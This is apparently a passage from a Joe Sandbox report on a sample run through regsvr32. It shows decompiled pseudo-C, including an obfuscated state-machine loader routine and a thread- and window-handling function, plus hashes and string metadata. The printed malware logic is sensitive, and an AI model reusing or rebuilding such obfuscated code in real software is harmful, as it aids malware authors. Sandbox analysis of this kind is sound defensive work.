                                                                                                                				_v1772 = _v1772 << 0xf;
                                                                                                                				_v1772 = _v1772 ^ 0x84990de2;
                                                                                                                				_v1772 = _v1772 >> 2;
                                                                                                                				_v1772 = _v1772 ^ 0x11c2f5f4;
                                                                                                                				_v1796 = 0x2ce783;
                                                                                                                				_v1796 = _v1796 >> 2;
                                                                                                                				_v1796 = _v1796 | 0x6f1782c3;
                                                                                                                				_v1796 = _v1796 + 0x2451;
                                                                                                                				_v1796 = _v1796 ^ 0x6f12aa04;
                                                                                                                				_v1720 = 0x9c60fd;
                                                                                                                				_v1720 = _v1720 << 1;
                                                                                                                				_t568 = 0x23;
                                                                                                                				_v1720 = _v1720 / _t568;
                                                                                                                				_v1720 = _v1720 ^ 0x000f58cb;
                                                                                                                				_v1756 = 0x8bc3f2;
                                                                                                                				_v1756 = _v1756 << 0xf;
                                                                                                                				_v1756 = _v1756 << 0xf;
                                                                                                                				_v1756 = _v1756 + 0xffff95d1;
                                                                                                                				_v1756 = _v1756 ^ 0x7ff02180;
                                                                                                                				_v1696 = 0x7cdd3a;
                                                                                                                				_v1696 = _v1696 >> 0xf;
                                                                                                                				_v1696 = _v1696 | 0xfdb2741d;
                                                                                                                				_v1696 = _v1696 ^ 0xfdbcd6c5;
                                                                                                                				_v1728 = 0xe73abc;
                                                                                                                				_v1728 = _v1728 | 0x6e75fbf9;
                                                                                                                				_v1728 = _v1728 ^ 0x6ef4a0a3;
                                                                                                                				_v1680 = 0xa3734b;
                                                                                                                				_v1680 = _v1680 >> 0xa;
                                                                                                                				_v1680 = _v1680 + 0xfffff23b;
                                                                                                                				_v1680 = _v1680 ^ 0x00099982;
                                                                                                                				_v1640 = 0x68bc18;
                                                                                                                				_t569 = 7;
                                                                                                                				_v1640 = _v1640 / _t569;
                                                                                                                				_v1640 = _v1640 ^ 0x0004804f;
                                                                                                                				_v1608 = 0x3b7e68;
                                                                                                                				_v1608 = _v1608 ^ 0x96f38c4e;
                                                                                                                				_v1608 = _v1608 ^ 0x96ce3d84;
                                                                                                                				_v1812 = 0x66c0c4;
                                                                                                                				_v1812 = _v1812 ^ 0x0371dc8e;
                                                                                                                				_v1812 = _v1812 ^ 0x83ad28b8;
                                                                                                                				_v1812 = _v1812 ^ 0xba53d132;
                                                                                                                				_v1812 = _v1812 ^ 0x3ae49120;
                                                                                                                				_v1740 = 0xa899c4;
                                                                                                                				_v1740 = _v1740 | 0x81257cef;
                                                                                                                				_v1740 = _v1740 * 0x16;
                                                                                                                				_v1740 = _v1740 ^ 0x24f9ffc3;
                                                                                                                				_v1744 = 0x1e6f8a;
                                                                                                                				_v1744 = _v1744 >> 5;
                                                                                                                				_v1744 = _v1744 ^ 0xd2194421;
                                                                                                                				_v1744 = _v1744 ^ 0xd21d6a9e;
                                                                                                                				_v1688 = 0x5de058;
                                                                                                                				_v1688 = _v1688 << 1;
                                                                                                                				_v1688 = _v1688 + 0xffff2d11;
                                                                                                                				_v1688 = _v1688 ^ 0x00b58664;
                                                                                                                				_v1712 = 0x5e2fb;
                                                                                                                				_v1712 = _v1712 << 5;
                                                                                                                				_v1712 = _v1712 ^ 0x8dfc1fd7;
                                                                                                                				_v1712 = _v1712 ^ 0x8d498c2f;
                                                                                                                				_v1808 = 0x5d15d;
                                                                                                                				_v1808 = _v1808 << 4;
                                                                                                                				_v1808 = _v1808 >> 0xe;
                                                                                                                				_v1808 = _v1808 >> 3;
                                                                                                                				_v1808 = _v1808 ^ 0x000869e0;
                                                                                                                				_v1732 = 0x112c8f;
                                                                                                                				_v1732 = _v1732 ^ 0x12cb99d9;
                                                                                                                				_t570 = 0x7c;
                                                                                                                				_v1732 = _v1732 * 0x57;
                                                                                                                				_v1732 = _v1732 ^ 0x6858727c;
                                                                                                                				_v1632 = 0x88191e;
                                                                                                                				_v1632 = _v1632 + 0xffffea18;
                                                                                                                				_v1632 = _v1632 ^ 0x008250c3;
                                                                                                                				_v1600 = 0xd2352c;
                                                                                                                				_v1600 = _v1600 ^ 0xc4ec158a;
                                                                                                                				_v1600 = _v1600 ^ 0xc43b0267;
                                                                                                                				_v1724 = 0x573c94;
                                                                                                                				_v1724 = _v1724 | 0xf8fbf6e1;
                                                                                                                				_v1724 = _v1724 ^ 0xf8f91863;
                                                                                                                				_v1792 = 0x74582;
                                                                                                                				_v1792 = _v1792 >> 4;
                                                                                                                				_v1792 = _v1792 >> 0xa;
                                                                                                                				_v1792 = _v1792 + 0xbeaf;
                                                                                                                				_v1792 = _v1792 ^ 0x0000ae4c;
                                                                                                                				_v1800 = 0xf1ee8c;
                                                                                                                				_v1800 = _v1800 * 0x54;
                                                                                                                				_v1800 = _v1800 >> 0xe;
                                                                                                                				_v1800 = _v1800 + 0xffffcc4e;
                                                                                                                				_v1800 = _v1800 ^ 0x000b99f5;
                                                                                                                				_v1612 = 0x5c5aae;
                                                                                                                				_v1612 = _v1612 + 0xff1;
                                                                                                                				_v1612 = _v1612 ^ 0x005a1e6e;
                                                                                                                				_v1604 = 0x27f9fc;
                                                                                                                				_v1604 = _v1604 / _t570;
                                                                                                                				_v1604 = _v1604 ^ 0x0008fdbe;
                                                                                                                				_v1748 = 0xa4da7d;
                                                                                                                				_t571 = 0x68;
                                                                                                                				_v1748 = _v1748 / _t571;
                                                                                                                				_v1748 = _v1748 ^ 0x34f5f9dd;
                                                                                                                				_v1748 = _v1748 ^ 0x34f242ab;
                                                                                                                				_v1624 = 0x1a2b2;
                                                                                                                				_t572 = 0x69;
                                                                                                                				_v1624 = _v1624 * 0x32;
                                                                                                                				_v1624 = _v1624 ^ 0x0057c87d;
                                                                                                                				_v1700 = 0x5bce4e;
                                                                                                                				_v1700 = _v1700 >> 5;
                                                                                                                				_v1700 = _v1700 * 0x6c;
                                                                                                                				_v1700 = _v1700 ^ 0x0134c15a;
                                                                                                                				_v1784 = 0x9955ec;
                                                                                                                				_v1784 = _v1784 >> 7;
                                                                                                                				_v1784 = _v1784 * 0x34;
                                                                                                                				_v1784 = _v1784 + 0xffff49ce;
                                                                                                                				_v1784 = _v1784 ^ 0x00353c69;
                                                                                                                				_v1708 = 0xb31777;
                                                                                                                				_v1708 = _v1708 ^ 0xc77cb4e9;
                                                                                                                				_v1708 = _v1708 + 0xc5f3;
                                                                                                                				_v1708 = _v1708 ^ 0xc7d1b3fe;
                                                                                                                				_v1676 = 0xaa4a91;
                                                                                                                				_v1676 = _v1676 + 0xfc6e;
                                                                                                                				_v1676 = _v1676 / _t572;
                                                                                                                				_v1676 = _v1676 ^ 0x000c8e39;
                                                                                                                				_v1684 = 0xb648eb;
                                                                                                                				_v1684 = _v1684 >> 4;
                                                                                                                				_v1684 = _v1684 + 0x8860;
                                                                                                                				_v1684 = _v1684 ^ 0x00058981;
                                                                                                                				_v1660 = 0x513288;
                                                                                                                				_v1660 = _v1660 | 0x1cfd3e15;
                                                                                                                				_v1660 = _v1660 ^ 0x1cf1ec34;
                                                                                                                				_v1692 = 0x91b840;
                                                                                                                				_v1692 = _v1692 << 3;
                                                                                                                				_v1692 = _v1692 + 0xffff3bf5;
                                                                                                                				_v1692 = _v1692 ^ 0x048d4768;
                                                                                                                				_v1644 = 0x6a299;
                                                                                                                				_v1644 = _v1644 << 0xa;
                                                                                                                				_v1644 = _v1644 ^ 0x1a8e8b21;
                                                                                                                				_v1652 = 0x3d94ce;
                                                                                                                				_v1652 = _v1652 >> 1;
                                                                                                                				_v1652 = _v1652 ^ 0x001bc2e7;
                                                                                                                				_v1768 = 0xb0a76e;
                                                                                                                				_v1768 = _v1768 << 6;
                                                                                                                				_v1768 = _v1768 + 0xa6cd;
                                                                                                                				_v1768 = _v1768 >> 0xa;
                                                                                                                				_v1768 = _v1768 ^ 0x0004832b;
                                                                                                                				_v1628 = 0x2e4687;
                                                                                                                				_v1628 = _v1628 + 0xffffac4b;
                                                                                                                				_v1628 = _v1628 ^ 0x002cc275;
                                                                                                                				_v1636 = 0xa9f549;
                                                                                                                				_v1636 = _v1636 + 0xffff292b;
                                                                                                                				_v1636 = _v1636 ^ 0x00a23c9a;
                                                                                                                				_v1760 = 0x45f6a6;
                                                                                                                				_v1760 = _v1760 >> 0xf;
                                                                                                                				_v1760 = _v1760 ^ 0xccdd989a;
                                                                                                                				_t573 = 0xa;
                                                                                                                				_v1760 = _v1760 / _t573;
                                                                                                                				_v1760 = _v1760 ^ 0x147ba7f9;
                                                                                                                				_v1752 = 0x2233d0;
                                                                                                                				_v1752 = _v1752 << 8;
                                                                                                                				_v1752 = _v1752 >> 4;
                                                                                                                				_v1752 = _v1752 + 0xfffff122;
                                                                                                                				_v1752 = _v1752 ^ 0x02232ddb;
                                                                                                                				_v1620 = 0xd19212;
                                                                                                                				_v1620 = _v1620 + 0xffff56ae;
                                                                                                                				_v1620 = _v1620 ^ 0x00df8423;
                                                                                                                				_v1668 = 0x399e92;
                                                                                                                				_t574 = 0x36;
                                                                                                                				_v1668 = _v1668 / _t574;
                                                                                                                				_v1668 = _v1668 * 0x3e;
                                                                                                                				_v1668 = _v1668 ^ 0x00471d1e;
                                                                                                                				_t631 = _v1592;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t575 = 0x622b027;
                                                                                                                					L2:
                                                                                                                					while(_t633 != 0x984a2e) {
                                                                                                                						if(_t633 == _t575) {
                                                                                                                							_push(_v1592);
                                                                                                                							_t543 = E001A71E3( &_v1588, _v1724, _t575, _v1792, _v1800,  &_v1564, _v1612);
                                                                                                                							_t638 =  &(_t638[7]);
                                                                                                                							__eflags = _t543;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								E001B02D8(_v1588, _v1604, _v1748, _v1624);
                                                                                                                								E001B02D8(_v1584, _v1700, _v1784, _v1708);
                                                                                                                								_t638 =  &(_t638[4]);
                                                                                                                							}
                                                                                                                							L14:
                                                                                                                							_t633 = 0x7c360ca;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t575 = 0x622b027;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t633 == 0x7c360ca) {
                                                                                                                							return E001B02D8(_v1592, _v1752, _v1620, _v1668);
                                                                                                                						}
                                                                                                                						if(_t633 == 0x9693e9c) {
                                                                                                                							_t633 = 0x984a2e;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t633 == 0xa9a4faa) {
                                                                                                                							_t549 = E001B4E54(_v1676, 0, __eflags, 0,  &_v1588, _v1684,  &_v1564, _v1660, _t575, _v1692);
                                                                                                                							__eflags = _t549;
                                                                                                                							if(_t549 == 0) {
                                                                                                                								L25:
                                                                                                                								return _t549;
                                                                                                                							}
                                                                                                                							E001B02D8(_v1588, _v1644, _v1652, _v1768);
                                                                                                                							return E001B02D8(_v1584, _v1628, _v1636, _v1760);
                                                                                                                						}
                                                                                                                						if(_t633 == 0xda9000a) {
                                                                                                                							E001C0575(_v1780, _v1736, __eflags, _t575,  &_v1044, _v1596);
                                                                                                                							 *((short*)(E001A2263( &_v1044, _v1764, _v1672, _v1804))) = 0;
                                                                                                                							E001B9054(_v1648,  &_v524, __eflags, _v1788, _v1772, _v1796);
                                                                                                                							_push(_v1728);
                                                                                                                							_push(0x1a11a8);
                                                                                                                							_push(_v1696);
                                                                                                                							E001B8EB3( &_v1044, __eflags, _v1680, _v1720, _v1640,  &_v1564, _v1608, E001BF5D9(_v1720, _v1756, __eflags), _v1812);
                                                                                                                							E001BF94B(_t556, _v1740, _v1744, _v1688, _v1712);
                                                                                                                							_t560 = E001C05F6( &_v1564, _t561, _v1808, _v1732, _v1632, _v1600);
                                                                                                                							_t638 =  &(_t638[0x19]);
                                                                                                                							__eflags = _t560;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_t541 = 0xb6f9751;
                                                                                                                								__eflags = _t631 - 0xb6f9751;
                                                                                                                								_t575 = 0x622b027;
                                                                                                                								_t633 =  ==  ? 0x622b027 : 0xa9a4faa;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						if(_t633 != 0xf1ce6d9) {
                                                                                                                							L20:
                                                                                                                							__eflags = _t633 - 0xf890da5;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							return _t541;
                                                                                                                						}
                                                                                                                						if(_t631 != _t541) {
                                                                                                                							_t633 = 0xda9000a;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_push(_t575);
                                                                                                                						_t549 = E001B3983( &_v1592, _v1704, _v1664, _v1656, _v1716);
                                                                                                                						_t638 =  &(_t638[5]);
                                                                                                                						if(_t549 == 0) {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						_t633 = 0xda9000a;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t539 = E001C26FC();
                                                                                                                					__eflags = _t539 - E001C131D();
                                                                                                                					_t541 = 0xb6f9751;
                                                                                                                					_t633 = 0xf1ce6d9;
                                                                                                                					_t631 =  !=  ? 0xb6f9751 : 0x5ebfea7;
                                                                                                                					_t575 = 0x622b027;
                                                                                                                					goto L20;
                                                                                                                				}
                                                                                                                			}
























































































                                                                                                                0x001ab6ca
                                                                                                                0x001ab6c5
                                                                                                                0x001ab6e5
                                                                                                                0x00000000
                                                                                                                0x001ab9ea
                                                                                                                0x001ab6f1
                                                                                                                0x001ab885
                                                                                                                0x00000000
                                                                                                                0x001ab885
                                                                                                                0x001ab6fd
                                                                                                                0x001ab97e
                                                                                                                0x001ab986
                                                                                                                0x001ab988
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9f5
                                                                                                                0x001ab9a3
                                                                                                                0x00000000
                                                                                                                0x001ab9c6
                                                                                                                0x001ab709
                                                                                                                0x001ab778
                                                                                                                0x001ab7ac
                                                                                                                0x001ab7ba
                                                                                                                0x001ab7c2
                                                                                                                0x001ab7c6
                                                                                                                0x001ab7cb
                                                                                                                0x001ab815
                                                                                                                0x001ab832
                                                                                                                0x001ab859
                                                                                                                0x001ab85e
                                                                                                                0x001ab861
                                                                                                                0x001ab863
                                                                                                                0x001ab86c
                                                                                                                0x001ab876
                                                                                                                0x001ab878
                                                                                                                0x001ab87d
                                                                                                                0x00000000
                                                                                                                0x001ab87d
                                                                                                                0x00000000
                                                                                                                0x001ab863
                                                                                                                0x001ab711
                                                                                                                0x001ab93c
                                                                                                                0x001ab93c
                                                                                                                0x001ab942
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ab942
                                                                                                                0x001ab719
                                                                                                                0x001ab756
                                                                                                                0x00000000
                                                                                                                0x001ab756
                                                                                                                0x001ab71b
                                                                                                                0x001ab73c
                                                                                                                0x001ab741
                                                                                                                0x001ab746
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ab74c
                                                                                                                0x00000000
                                                                                                                0x001ab74c
                                                                                                                0x001ab917
                                                                                                                0x001ab923
                                                                                                                0x001ab92a
                                                                                                                0x001ab92f
                                                                                                                0x001ab934
                                                                                                                0x001ab937
                                                                                                                0x00000000
                                                                                                                0x001ab937

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 5d+$@7$Q$$X]$h~;$i7P&$i<5$|rXh
                                                                                                                • API String ID: 2962429428-4098937169
                                                                                                                • Opcode ID: 7453b5fb682db0a03e07f07c96acb4bd75c459ec1e69be3f915431a21a5ec0e5
                                                                                                                • Instruction ID: 2e8f575114a46f6d2bec20dfed92e90284238eb82a77c36e4210da12092137f8
                                                                                                                • Opcode Fuzzy Hash: 7453b5fb682db0a03e07f07c96acb4bd75c459ec1e69be3f915431a21a5ec0e5
                                                                                                                • Instruction Fuzzy Hash: C04201715083818FD7B9CF25C58AB9BBBE1BBC5708F108A1DE5DA96260D7B18948CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E1000FFB0(struct HWND__* __edx) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t129;
                                                                                                                				long* _t132;
                                                                                                                				long* _t137;
                                                                                                                				void* _t145;
                                                                                                                				intOrPtr _t151;
                                                                                                                				long* _t152;
                                                                                                                				long* _t153;
                                                                                                                				long* _t154;
                                                                                                                				long* _t155;
                                                                                                                				void* _t181;
                                                                                                                				intOrPtr _t188;
                                                                                                                				signed int _t189;
                                                                                                                				void* _t198;
                                                                                                                				signed int _t202;
                                                                                                                				long* _t204;
                                                                                                                				signed int _t205;
                                                                                                                				long* _t209;
                                                                                                                				signed int** _t213;
                                                                                                                				signed int** _t215;
                                                                                                                				intOrPtr _t216;
                                                                                                                				long* _t222;
                                                                                                                				long* _t224;
                                                                                                                				long* _t226;
                                                                                                                				long* _t228;
                                                                                                                				signed int _t229;
                                                                                                                				long* _t232;
                                                                                                                				long* _t234;
                                                                                                                				long* _t235;
                                                                                                                				long* _t237;
                                                                                                                				long* _t239;
                                                                                                                				long* _t241;
                                                                                                                				long* _t243;
                                                                                                                				long* _t245;
                                                                                                                				intOrPtr _t255;
                                                                                                                				long* _t264;
                                                                                                                				long* _t265;
                                                                                                                				long* _t266;
                                                                                                                				long* _t267;
                                                                                                                				long* _t269;
                                                                                                                				long* _t274;
                                                                                                                				long* _t275;
                                                                                                                				long* _t276;
                                                                                                                				long* _t281;
                                                                                                                				signed int _t282;
                                                                                                                				long* _t296;
                                                                                                                				signed int _t307;
                                                                                                                				signed int _t309;
                                                                                                                				intOrPtr _t317;
                                                                                                                				long _t319;
                                                                                                                				void* _t321;
                                                                                                                				signed int _t322;
                                                                                                                				void* _t324;
                                                                                                                				void* _t345;
                                                                                                                
                                                                                                                				_t295 = __edx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051FE8);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t322 = _t321 - 0x6c;
                                                                                                                				_push(_t229);
                                                                                                                				_push(_t312);
                                                                                                                				_t129 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t129 ^ _t322);
                                                                                                                				 *[fs:0x0] = _t322 + 0x80;
                                                                                                                				_t232 =  *0x1006f050; // 0x0
                                                                                                                				_t319 = 0;
                                                                                                                				_t325 = _t232[0x99];
                                                                                                                				if(_t232[0x99] != 0) {
                                                                                                                					L2:
                                                                                                                					_t315 =  *(_t322 + 0x90);
                                                                                                                					_t312 = SendMessageA;
                                                                                                                					if(_t315 != _t319) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t315 = E1000CD90(_t325);
                                                                                                                					_t188 =  *((intOrPtr*)(_t315 + 8));
                                                                                                                					_t229 = 0;
                                                                                                                					 *(_t322 + 0x20) = _t315;
                                                                                                                					 *((intOrPtr*)(_t322 + 0x24)) = _t188;
                                                                                                                					if(_t188 > 0) {
                                                                                                                						while(1) {
                                                                                                                							_t189 = E100173A6();
                                                                                                                							__eflags = _t189 - _t319;
                                                                                                                							_t271 = 0 | __eflags != 0x00000000;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t271 = _t189;
                                                                                                                							 *(_t322 + 0x18) =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0xc))))() + 0x10;
                                                                                                                							__eflags = _t229 - _t319;
                                                                                                                							 *(_t322 + 0x88) = _t319;
                                                                                                                							if(__eflags < 0) {
                                                                                                                								L21:
                                                                                                                								E1001729E(_t229, _t271, _t312, _t315, __eflags);
                                                                                                                								L22:
                                                                                                                								E1000FE50(_t319, _t315);
                                                                                                                								_t322 = _t322 + 4;
                                                                                                                								L23:
                                                                                                                								_t266 =  *0x1006f050; // 0x0
                                                                                                                								_t295 = _t266[0x15c];
                                                                                                                								_t315 = SendMessageA(_t266[0x15c], 0x110a, 1, _t315);
                                                                                                                								_t329 = _t315 - _t319;
                                                                                                                								if(_t315 != _t319) {
                                                                                                                									L3:
                                                                                                                									_t264 =  *0x1006f050; // 0x0
                                                                                                                									_t265 =  &(_t264[0x154]);
                                                                                                                									_t181 = E10026483(_t265, _t315);
                                                                                                                									_t328 = _t181;
                                                                                                                									if(_t181 == 0) {
                                                                                                                										goto L22;
                                                                                                                									} else {
                                                                                                                										_push(_t265);
                                                                                                                										_t267 =  *0x1006f050; // 0x0
                                                                                                                										 *(_t322 + 0x94) = _t322;
                                                                                                                										_push(_t315);
                                                                                                                										E10026A46(_t229,  &(_t267[0x154]), _t295, _t312, _t315, _t328);
                                                                                                                										_t269 =  *0x1006f050; // 0x0
                                                                                                                										E1000EC00(_t269, _t295, _t328, _t322);
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								__eflags = _t229 -  *((intOrPtr*)(_t315 + 8));
                                                                                                                								if(__eflags >= 0) {
                                                                                                                									goto L21;
                                                                                                                								} else {
                                                                                                                									_push( *((intOrPtr*)(_t315 + 4)) + _t229 * 4);
                                                                                                                									E10001FF0(_t322 + 0x1c);
                                                                                                                									_t274 =  *0x1006f050; // 0x0
                                                                                                                									_t315 =  *(_t322 + 0x18);
                                                                                                                									_t275 =  &(_t274[0x13f]);
                                                                                                                									E1001D2C4(_t275, _t315);
                                                                                                                									_push(_t275);
                                                                                                                									_t319 = _t315 - 0x10;
                                                                                                                									 *(_t322 + 0x20) = _t322;
                                                                                                                									_t312 = _t322;
                                                                                                                									_t198 = E10001080(_t229, _t319);
                                                                                                                									_t324 = _t322 + 4;
                                                                                                                									_t295 = _t324 + 0x18;
                                                                                                                									 *_t322 = _t198 + 0x10;
                                                                                                                									_t276 =  *0x1006f050; // 0x0
                                                                                                                									E1000E6F0(_t276, _t324 + 0x18, __eflags, _t324 + 0x18);
                                                                                                                									 *((char*)(_t324 + 0x90)) = 1;
                                                                                                                									_t202 = E1003BD06( *((intOrPtr*)(_t324 + 0x14)), 0x10056948);
                                                                                                                									_t322 = _t324 + 8;
                                                                                                                									_t202 = _t202 & 0xffffff00 | _t202 != 0x00000000;
                                                                                                                									if((_t202 & 0xffffff00 | _t202 != 0x00000000) != 0) {
                                                                                                                										_t222 =  *0x1006f050; // 0x0
                                                                                                                										_t28 =  &(_t222[0xd6]); // 0x358
                                                                                                                										E10026562(_t28, 1, _t222[0x43b], 0x10056948, 0, 0, 0, 0);
                                                                                                                										_t224 =  *0x1006f050; // 0x0
                                                                                                                										_t30 =  &(_t224[0xd6]); // 0x358
                                                                                                                										E1002637C(_t30, _t224[0x43b], 0, _t315);
                                                                                                                										_t295 =  *(_t322 + 0x14);
                                                                                                                										_t226 =  *0x1006f050; // 0x0
                                                                                                                										_t33 =  &(_t226[0xd6]); // 0x358
                                                                                                                										E1002637C(_t33, _t226[0x43b], 1,  *(_t322 + 0x14));
                                                                                                                										_t228 =  *0x1006f050; // 0x0
                                                                                                                										_t34 =  &(_t228[0x43b]);
                                                                                                                										 *_t34 = _t228[0x43b] + 1;
                                                                                                                										__eflags =  *_t34;
                                                                                                                									}
                                                                                                                									_t204 =  *0x1006f050; // 0x0
                                                                                                                									_t204[0x43a] = _t204[0x43a] + 1;
                                                                                                                									_t205 = E100173A6();
                                                                                                                									__eflags = _t205;
                                                                                                                									_t271 = 0 | __eflags != 0x00000000;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										break;
                                                                                                                									} else {
                                                                                                                										 *((intOrPtr*)(_t322 + 0x1c)) =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))() + 0x10;
                                                                                                                										_t209 =  *0x1006f050; // 0x0
                                                                                                                										_push(_t209[0x43c]);
                                                                                                                										_push(_t209[0x43b]);
                                                                                                                										 *((char*)(_t322 + 0x9c)) = 2;
                                                                                                                										E10003500(_t322 + 0x28, 0x1005873c, _t209[0x43a]);
                                                                                                                										_t281 =  *0x1006f050; // 0x0
                                                                                                                										_t317 =  *((intOrPtr*)(_t322 + 0x30));
                                                                                                                										_t322 = _t322 + 0x14;
                                                                                                                										_t282 =  &(_t281[0xc1]);
                                                                                                                										E1001D2C4(_t282, _t317);
                                                                                                                										_t213 = _t317 - 0x10;
                                                                                                                										 *(_t322 + 0x88) = 1;
                                                                                                                										_t50 =  &(_t213[3]); // 0xc
                                                                                                                										_t307 = _t50;
                                                                                                                										asm("lock xadd [edx], ecx");
                                                                                                                										__eflags = (_t282 | 0xffffffff) - 1;
                                                                                                                										if((_t282 | 0xffffffff) - 1 <= 0) {
                                                                                                                											_t307 =  *( *_t213);
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t307 + 4))))(_t213);
                                                                                                                										}
                                                                                                                										_t215 =  *(_t322 + 0x14) + 0xfffffff0;
                                                                                                                										 *(_t322 + 0x88) = 0;
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										_t309 = (_t307 | 0xffffffff) - 1;
                                                                                                                										__eflags = _t309;
                                                                                                                										if(_t309 <= 0) {
                                                                                                                											_t309 =  *( *_t215);
                                                                                                                											 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))(_t215);
                                                                                                                										}
                                                                                                                										 *(_t322 + 0x88) = 0xffffffff;
                                                                                                                										asm("lock xadd [ecx], edx");
                                                                                                                										_t295 = (_t309 | 0xffffffff) - 1;
                                                                                                                										__eflags = (_t309 | 0xffffffff) - 1;
                                                                                                                										if((_t309 | 0xffffffff) - 1 <= 0) {
                                                                                                                											_t216 =  *((intOrPtr*)( *_t319));
                                                                                                                											_t295 =  *(_t216 + 4);
                                                                                                                											 *( *(_t216 + 4))(_t319);
                                                                                                                										}
                                                                                                                										_t229 = _t229 + 1;
                                                                                                                										_t319 = 0;
                                                                                                                										__eflags = _t229 -  *((intOrPtr*)(_t322 + 0x24));
                                                                                                                										if(__eflags < 0) {
                                                                                                                											_t315 =  *(_t322 + 0x20);
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L24;
                                                                                                                						}
                                                                                                                						E10001000(_t271, _t295, 0x80004005);
                                                                                                                						goto L21;
                                                                                                                					} else {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L24:
                                                                                                                				_t132 =  *0x1006f050; // 0x0
                                                                                                                				TerminateThread(_t132[0xa3], _t319);
                                                                                                                				_t296 =  *0x1006f050; // 0x0
                                                                                                                				SendMessageA(_t296[8], 0x111, 0xfff555ee, 0xf55555ee);
                                                                                                                				E1002181C(_t229, _t312, _t315, _t329, 0x10058350, _t319, _t319);
                                                                                                                				_t234 =  *0x1006f050; // 0x0
                                                                                                                				_t234[0x43a] = _t319;
                                                                                                                				_t297 =  *0x1006f050; // 0x0
                                                                                                                				_t297[0x43b] = _t319;
                                                                                                                				_t137 =  *0x1006f050; // 0x0
                                                                                                                				_t137[0x43c] = _t319;
                                                                                                                				_t235 =  *0x1006f050; // 0x0
                                                                                                                				E1001D2C4( &(_t235[0x13f]), 0x10056948);
                                                                                                                				_t237 =  *0x1006f050; // 0x0
                                                                                                                				E1001D2C4( &(_t237[0x115]), 0x10056948);
                                                                                                                				_t239 =  *0x1006f050; // 0x0
                                                                                                                				E1001D39A( &(_t239[0x12a]), 1);
                                                                                                                				_t241 =  *0x1006f050; // 0x0
                                                                                                                				E1001D2C4( &(_t241[0xc1]), 0x10056948);
                                                                                                                				_t243 =  *0x1006f050; // 0x0
                                                                                                                				E1001D39A( &(_t243[0x100]), _t319);
                                                                                                                				_t245 =  *0x1006f050; // 0x0
                                                                                                                				E1001D39A( &(_t245[0xeb]), _t319);
                                                                                                                				_t66 = _t322 + 0x28; // 0x1005694c
                                                                                                                				E100205E2(_t66, _t329);
                                                                                                                				_push(_t319);
                                                                                                                				_push(0x40);
                                                                                                                				_push("Setting\\ScanSet.dat");
                                                                                                                				_t67 = _t322 + 0x34; // 0x1005694c
                                                                                                                				 *(_t322 + 0x94) = 3;
                                                                                                                				_t145 = E10020A24(_t67, _t297, _t329);
                                                                                                                				_t330 = _t145;
                                                                                                                				if(_t145 != 0) {
                                                                                                                					_t69 = _t322 + 0x28; // 0x10001b00
                                                                                                                					_t70 =  *_t69 + 0x28; // 0xcccccccc
                                                                                                                					 *((intOrPtr*)( *_t70))(_t319, _t319, _t319);
                                                                                                                					_push(_t319);
                                                                                                                					_push(0x1000);
                                                                                                                					_push(1);
                                                                                                                					_t72 = _t322 + 0x34; // 0x10056970
                                                                                                                					_t73 = _t322 + 0x48; // 0x10056980
                                                                                                                					E10020058(3, _t73,  *_t69, _t312, _t315, _t330);
                                                                                                                					_t331 =  *(_t322 + 0x50) & 0x00000001;
                                                                                                                					 *(_t322 + 0x88) = 4;
                                                                                                                					if(( *(_t322 + 0x50) & 0x00000001) == 0) {
                                                                                                                						_t78 = _t322 + 0x4c; // 0x10035bfe
                                                                                                                						_push( *_t78);
                                                                                                                						_push(4);
                                                                                                                						E10020287(3,  *_t78, _t312, _t315, _t331);
                                                                                                                					}
                                                                                                                					_t79 = _t322 + 0x60; // 0x1001cdb2
                                                                                                                					_t151 =  *_t79;
